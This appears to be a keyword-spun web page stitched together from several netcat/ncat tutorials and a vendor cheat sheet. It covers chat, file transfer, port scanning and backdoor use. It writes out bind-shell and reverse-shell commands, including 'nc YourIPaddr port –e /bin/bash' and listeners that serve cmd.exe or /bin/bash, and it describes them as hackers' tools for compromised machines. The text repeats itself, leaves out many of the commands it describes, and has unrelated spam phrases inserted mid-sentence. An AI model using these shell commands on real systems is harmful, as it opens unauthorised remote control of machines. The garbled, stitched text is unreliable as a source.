The nc command is often used for the following tasks: simple TCP proxies. Shell-script based HTTP clients and servers. Network daemon testing. A SOCKS or HTTP ProxyCommand for ssh(1) The nc command can also be run as netcat, using the identical options. The following options are supported: –4. Force nc to use IPv4 addresses only.
- C: nc –l –p LocalPort –e cmd.exe Create a shell on local port LocalPort that can then be accessed using a fundamental Netcat client Reverse backdoor shell on Linux: $ nc YourIPaddr port –e /bin/bash nc YourIPaddr port –e cmd.exe YourIPaddr on local port port. This shell can then be captured using a fundamental nc.
- Ncat is a feature-packed networking utility which reads and writes data across networks from the command line. Ncat was written for the Nmap Project as a much-improved reimplementation of the venerable Netcat. It uses both TCP and UDP for communication and is designed to be a reliable back-end tool to instantly provide network connectivity to.
Netcat
Netcat is a terminal application that is similar to the telnet program but has lot more features.
Its a 'power version' of the traditional telnet program.
Apart from basic telnet functions it can do various other things like creating socket servers to listen for incoming connections on ports, transfer files from the terminal etc.
So it is a small tool that is packed with lots of features. Therefore its called the 'Swiss-army knife for TCP/IP'.
The netcat manual defines netcat as
So basically netcat is a tool to do some bidirectional network communication over the TCP/UDP protocols.
More technically speaking, netcat can act as a socket server or client and interact with other programs at the same time sending and receiving data through the network.
Such a definition sounds too generic and make it difficult to understand what exactly this tool does and what is it useful for. This can be understood only by using and playing with it.
Ncat
So the first thing to do would be to setup netcat on your machine. Netcat comes in various flavors. Means it is available from multiple vendors.
But most of them have similar functionality. On Ubuntu there are 3 packages called netcat-openbsd, netcat-traditional and ncat.
My preferred version is ncat. Ncat has been developed by the nmap team is the best of all netcats available and most importantly its cross platform and works very well on windows.
Project website:
http://nmap.org/ncat/
http://nmap.org/ncat/
Install Ncat on Windows
Windows version of netcat can be downloaded from
http://joncraton.org/blog/46/netcat-for-windows
http://joncraton.org/blog/46/netcat-for-windows
Simply download and extract the files somewhere suitable.
Or download ncat windows version
http://nmap.org/ncat/
http://nmap.org/ncat/
Install Ncat on Ubuntu / Linux Mint / Linux
Ubuntu syntaptic package has netcat-openbsd and netcat-traditional packages available. Install both of them. Nmap also comes with a netcat implementation called ncat. Install that too.
Install on Ubuntu
To use netcat-openbsd implementation use 'nc' command.
To use netcat-traditional implementation use 'nc.traditional' command
To use nmap ncat use the 'ncat' command.
To use netcat-traditional implementation use 'nc.traditional' command
To use nmap ncat use the 'ncat' command.
Netcat Command Examples
In the following tutorial we are going to use all of them in different examples in different ways.
1. Telnet
The very first thing netcat can be used as is a telnet program. Lets see how.
Now netcat is connected to google.com on port 80 and its time to send some message. Lets try to fetch the index page. For this type 'GET index.html HTTP/1.1' and hit the Enter key twice. Remember twice.
The output from google.com has been received and echoed on the terminal.
2. Simple socket server
To open a simple socket server type in the following command.
The above command means : Netcat listen to TCP port 1234. The -v option gives verbose output for better understanding. Now from another terminal try to connect to port 1234 using telnet command as follows :
After connecting we send some test message like abc and ting tong to the netcat socket server. The netcat socket server will echo the data received from the telnet client.
This is a complete Chatting System. Type something in netcat terminal and it will show up in telnet terminal as well. So this technique can be used for chatting between 2 machines.
Complete ECHO Server
Ncat with the -c option can be used to start a echo server. Source
Start the echo server using ncat as follows
Now from another terminal connect using telnet and type something. It will be send back with '[echo]' prefixed.
The netcat-openbsd version does not have the -c option. Remember to always use the -v option for verbose output.
The netcat-openbsd version does not have the -c option. Remember to always use the -v option for verbose output.
Note : Netcat can be told to save the data to a file instead of echoing it to the terminal. Save data suikoden 1 mcr epsxe.
3. Create UDP Server
Netcat works with udp ports as well. To start a netcat server using udp ports use the -u option
4. UDP Client
Connect to this server using netcat from another terminal
Now both terminals can chat with each other.
5. File transfer
A whole file can be transferred with netcat. Here is a quick example.
One machine A - Send File
In the above command, the cat command reads and outputs the content of happy.txt. The output is not echoed to the terminal, instead is piped or fed to ncat which has opened a socket server on port 5555.
On machine B - Receive File
In the above command ncat will connect to localhost on port 5555 and whatever it receives will be written to happy_copy.txt
Now happy_copy.txt will be a copy of happy.txt since the data being send over port 5555 is the content of happy.txt in the previous command. Imation f100 software update.
Netcat will send the file only to the first client that connects to it. After that its over.
And after the first client closes down connection, netcat server will also close down the connection.
And after the first client closes down connection, netcat server will also close down the connection.
6. Port scanning
Netcat can also be used for port scanning. However this is not a proper use of netcat and a more applicable tool like nmap should be used.
The '-n' parameter here prevents DNS lookup, '-z' makes nc not receive any data from the server, and '-w 1' makes the connection timeout after 1 second of inactivity.
7. Remote Shell/Backdoor
Ncat can be used to start a basic shell on a remote system on a port without the need of ssh. Here is a quick example.
The above will start a server on port 7777 and will pass all incoming input to bash command and the results will be send back. The command basically converts the bash program into a server. So netcat can be used to convert any process into a server.
Connect to this bash shell using nc from another terminal
Windows Nc Netcat
Now try executing any command like help , ls , pwd etc.
Windows
On windows machine the cmd.exe (dos prompt program) is used to start a similar shell using netcat. The syntax of the command is same.
Now another console can connect using the telnet command
Although netcat though can be used to setup remote shells, is not useful to get an interactive shell on a remote system because in most cases netcat would not be installed on a remote system.
The most effective method to get a shell on a remote machine using netcat is by creating reverse shells.
8. Reverse Shells
This is the most powerful feature of netcat for which it is most used by hackers. Netcat is used in almost all reverse shell techniques to catch the reverse connection of shell program from a hacked system.
![Windows Windows](https://www.digitalmunition.me/wp-content/uploads/2019/07/1563002302_813_Netcat-vs-Cryptcat-Remote-Shell-to-Kali-Linux-from-Windows-machine.png)
Reverse telnet
First lets take an example of a simple reverse telnet connection. In ordinate telnet connection the client connects to the server to start a communication channel.
Now using the above technique you can connect to say port 80 of the server to fetch a webpage. However a hacker is interested in getting a command shell. Its the command prompt of windows or the terminal of linux. The command shell gives ultimate control of the remote system. Now there is no service running on the remote server to which you can connect and get a command shell.
So when a hacker hacks into a system, he needs to get a command shell. Since its not possible directly, the solution is to use a reverse shell. In a reverse shell the server initiates a connection to the hacker's machine and gives a command shell.
To wait for incoming connections, a local socket listener has to be opened. Netcat/ncat can do this.
First a netcat server has to be started on local machine or the hacker's machine.
First a netcat server has to be started on local machine or the hacker's machine.
machine A
The above will start a socket server (listener) on port 8888 on local machine/hacker's machine.
Now a reverse shell has to be launched on the target machine/hacked machine. There are a number of ways to launch reverse shells.
For any method to work, the hacker either needs to be able to execute arbitrary command on the system or should be able to upload a file that can be executed by opening from the browser (like a php script).
In this example we are not doing either of the above mentioned things. We shall just run netcat on the server also to throw a reverse command shell to demonstrate the concept. So netcat should be installed on the server or target machine.
Machine B :
This command will connect to machine A on port 8888 and feed in the output of bash effectively giving a shell to machine A. Now machine A can execute any command on machine B.
Machine A
In a real hacking/penetration testing scenario its not possible to run netcat on target machine. Therefore other techniques are employed to create a shell. These include uploading reverse shell php scripts and running them by opening them in browser. Or launching a buffer overflow exploit to execute reverse shell payload.
Conclusion
So in the above examples we saw how to use netcat for different network activities like telnet, reverse shells etc. Hackers mostly use it for creating quick reverse shells.
In this tutorial we covered some of the basic and common uses of netcat. Check out the wikipedia article for more information on what else netcat can do.
The Netcat utility program supports a wide range of commands to manage networks and monitor the flow of traffic data between systems. Computer networks, including the world wide web, are built on the backbone of the Transmission Control Protocol (TCP) and User Datagram Protocol (UDP). Think of it as a free and easy companion tool to use alongside Wireshark, which specializes in the analysis of network packets. The original version of Netcat was released back in 1995 and has received a number of iterative updates in the decades since.
- Netcat Commands
What is Netcat Used For?
Netcat can be a useful tool for any IT team, though the growth of internally managed network services and cloud computing make that particular environment a natural fit. Network and system administrators need to be able to quickly identify how their network is performing and what type of activity is occurring.
Get the Free Pen Testing Active Directory Environments EBook
“This really opened my eyes to AD security in a way defensive work never did.”
Netcat functions as a back-end tool that allows for port scanning and port listening. In addition, you can actually transfer files directly through Netcat or use it as a backdoor into other networked systems. Partnered with a tool like Varonis Edge, you would receive an alert of any unusual activity and could then use Netcat to investigate. Lastly, Netcat is a flexible tool because of how it can be scripted for larger tasks.
Basic Netcat Commands
Once you have a Netcat application set up on your Windows or Linux server, you can start running basic commands to test its functionality. Here are a few to get started with:
nc -help – This command will print a list of all of the available commands you can use in Netcat. It will come in handy if you run into any errors while writing a script or are unsure of how to proceed.
nc -z -v site.com – This will run a basic port scan of the specified website or server. Netcat will return verbose results with lists of ports and statuses. Keep in mind that you can use an IP address in place of the site domain.
nc -l – This command will instruct the local system to begin listening for TCP connections and UDP activity on a specific port number.
nc site.com 1234 (less than) file_name – This command will initiate the transfer of a file based on the specified port number.
Printf – Netcat can actually operate as a simplified web host. This command will let you save HTML code and publish it through your local server.
Netcat Command Syntax
All Netcat commands must start with the “netcat” identifier or “nc” as a shorter option. By default, the Netcat tool will assume you want to perform a port scan unless you indicate otherwise.
Different option parameters can be used that include: “-u” for UDP traffic instead of TCP, “-v” for verbose output, “-p” to specify a specific port, and “-D” to turn on full debugging mode. Individual attributes within a Netcat command must be separated with a space. The command prompt will inform you if you have a typo or unrecognized term in your script.
Port Scanning with Netcat Commands
When trying to diagnose a network issue or performance problem, executing a port scan with Netcat is a smart first step to take. The scan will check the status of all ports on the given domain or IP address so that you can determine whether a firewall or other blocking mechanism is in place.
A basic port scan command for an IP ncat address looks like this:
nc -v -n 8.8.8.8 1-1000
Note that the numbers at the end of the command tell Netcat to only scan for ports between numbers 1 and 1000.
If you don’t know the IP address of a server or website, then you can look it up via a ping terminal command or just insert the domain into the Netcat command:
nc -v -n google.com 1-1000
You should always perform port scans when connected to your local enterprise network. If not, you can configure your router with a VPN service to create a secure tunnel into the network.
Create a Chat or Web Server
Chat programs are on the rise. From open-source solutions to those that seemed to suddenly gain massive popularity, there are a wide range of chat and communication tools available to enterprise organizations. The reality is that some IT experts and system administrators would prefer a simple text-only solution. Windows Netcat can actually fill that need and allow for the transmission of messages across a local network.
To get started, you first need Netcat to start listening on a port number. Make sure not to choose a port that is already in use by another application or service.
nc -l -p 1299
Then all you need to do is launch the chat session with a new TCP connection:
nc localhost 1299
This process can also be used to spin up a basic web server from your local machine. Netcat will function as the web host and allow you to store HTML content which can then be viewed through a web browser.
First, create a new text document on your local system and make sure to use valid HTML tags. Then save the file as “index.html” and store it in the root of your Netcat directory. Now switch back to the Netcat tool and run this command:
printf ‘HTTP/1.1 200 OKnn%s’ “$(cat index.html)” | netcat -l 8999
To see the HTML in action, simply open any web browser and navigate to your local IP address with: 8999 at the end to specify the port of the host.
Verbose Scan with Netcat Commands
Every command you run in Netcat will include certain output text to indicate whether it was successful or not. For troubleshooting and debugging purposes, you’ll want to gather as much information and logs as possible while also investing in solutions like Varonis Datalert to detect threats and respond quickly. Netcat can help thanks to the verbose parameter which can be added to any basic Netcat command. Simply include “-v” to your command and run it again.
Even with this setting turned on, Netcat will not reveal any of your credentials or authentication data.
HTTP Requests with Netcat Commands
We’ve covered how you can use Netcat to host HTML pages on your local system. But the utility program can also be used to make web requests to outside servers. In this way, Netcat will essentially function as a web browser by obtaining raw HTML code.
Along with a tool like Varonis Edge, Netcat can be helpful for IT professionals who are looking into internet traffic issues or proxies. Here’s an example of how to obtain the HTML content from Google’s homepage:
printf “GET / HTTP/1.0rnrn” | nc google.com 80
Note that the port number 80 is required for this type of command since the world wide web uses it as a default for TCP over IP connections.
TCP Server and TCP Client Commands
Although the TCP protocol is primarily used for transferring web traffic around the world, it can actually be implemented at a local level for file transfers. To accomplish this, you need to run Netcat from two locations: one that will act as a server to send the file and one that will act as the client to receive it.
Run this Netcat command on the server instance to send the file over port 1499:
nc -l 1499 > filename.out
Then run this command on the client to accept, receive, and close the connection:
nc server.com 1499 (less than) filename.in
Make sure to replace “server.com” with the full hostname or IP address of the sending server.
ITEM with Netcat Commands
Newer versions of Netcat allow you to use ITEM format for transferring data instead of the standard TCP or UDP protocols. To accomplish this, you must follow this syntax:
file_path (pipe) device_path (pipe) network host
Prevent DNS Lookup with Netcat Commands
Netcat commands run fastest when they are operating purely on IP addresses. This because no time is wasted talking to domain name servers (DNS) to translate server names into IP addresses. If you find that your Netcat commands are still running slow, make sure to add the “-n” operator so that the utility knows that DNS lookups are not required.
Shell Scripting with Netcat
As mentioned earlier, one of the benefits of using Netcat is that it can be included as part of a larger script that performs an automated function. As part of your security procedures, you might want to run a full port scan on all of your servers to detect new malicious applications that are listening for a connection.
You could write a script that:
1. Imports a text file of server names or IP addresses
2. Calls Netcat to run a port scan on each server
3. Writes the output to a new text file for analysis Bass pro shops xps it2 5/5 onboard battery charger manual.
2. Calls Netcat to run a port scan on each server
3. Writes the output to a new text file for analysis Bass pro shops xps it2 5/5 onboard battery charger manual.
Multiple Netcat commands can be grouped together in a single script and be run through either a Linux or Windows shell. In some cases, it may be worthwhile to have the scripts on a regular timetable.
Launching Reverse (Backdoor) Shells
To get started, you need to enable the shell tool over a Netcat command by using Netcat reverse shell:
nc -n -v -l -p 5555 -e /bin/bash
Then from any other system on the network, you can test how to run commands on host after successful Netcat connection in bash.
nc -nv 127.0.0.1 5555
A reverse shell is a remote access approach where you run administrative commands from one terminal while connecting to another server on the network. To get started, you need to enable the shell tool over a Netcat command by using Netcat reverse shell:
nc -n -v -l -p 5555 -e /bin/bash
Then from any other system on the network, you can test how to run commands on the selected host after successful Netcat connection in bash:
nc -nv 127.0.0.1 5555
Netcat Cheat Sheet
Until you start using Netcat on a regular basis, you might get confused about the command syntax or forget what some of the parameters do. Don’t worry! We’ve included a cheat sheet below to help you find what you need quickly to run a working Netcat command.
![Command Command](https://i.stack.imgur.com/wM2v4.png)
Netcat Fundamentals
nc [options] [host] [port] – by default this will execute a port scan
nc -l [host] [port] – initiates a listener on the given port
Netcat Command Flags
nc -4 – use IPv4 only
nc -6 – use IPv6
nc -u – use UDP instead of TCP
nc -k -l – continue listening after disconnection
nc -n – skip DNS lookups
nc -v – provide verbose output
Netcat Relays on Windows
nc [host] [port] > relay.bat – open a relay connection
nc -l -p [port] -e relay.bat – connect to relay
Netcat Relays on Linux
nc -l -p [port] 0 (less than) backpipe (pipe) nc [client IP] [port] (pipe) tee backpipe
Netcat File Transfer
nc [host] [port] (greater than) file_name.out– send a file
nc [host] [port] (less than) file_name.in – receive a file
Netcat Port Scanner
nc -zv site.com 80 – scan a single port
nc -zv hostname.com 80 84 – scan a set of individual ports
nc -zv site.com 80-84 – scan a range of ports
Netcat Banners
echo “” | nc -zv -wl [host] [port range] – obtain the TCP banners for a range of ports
Netcat Backdoor Shells
Windows Nc Command Line
nc -l -p [port] -e /bin/bash – run a shell on Linux
Championship manager 01 02 mac download. nc -l -p [port] -e cmd.exe – run a shell on Netcat for Windows
Windows Nc Command Center
Additional Netcat Resources
Windows Nc Command Download
In today’s fast-changing world of technology and increasingly complex networks, companies need to be proactive when it comes to cybersecurity. That means hiring experts who know what threats to look for and how to combat them. Otherwise, a single instance of a cyberattack like ransomware could lead to lasting damage for the entire organization. Pairing solutions from Varonis with tools like Netcat will help to keep your internal network safer.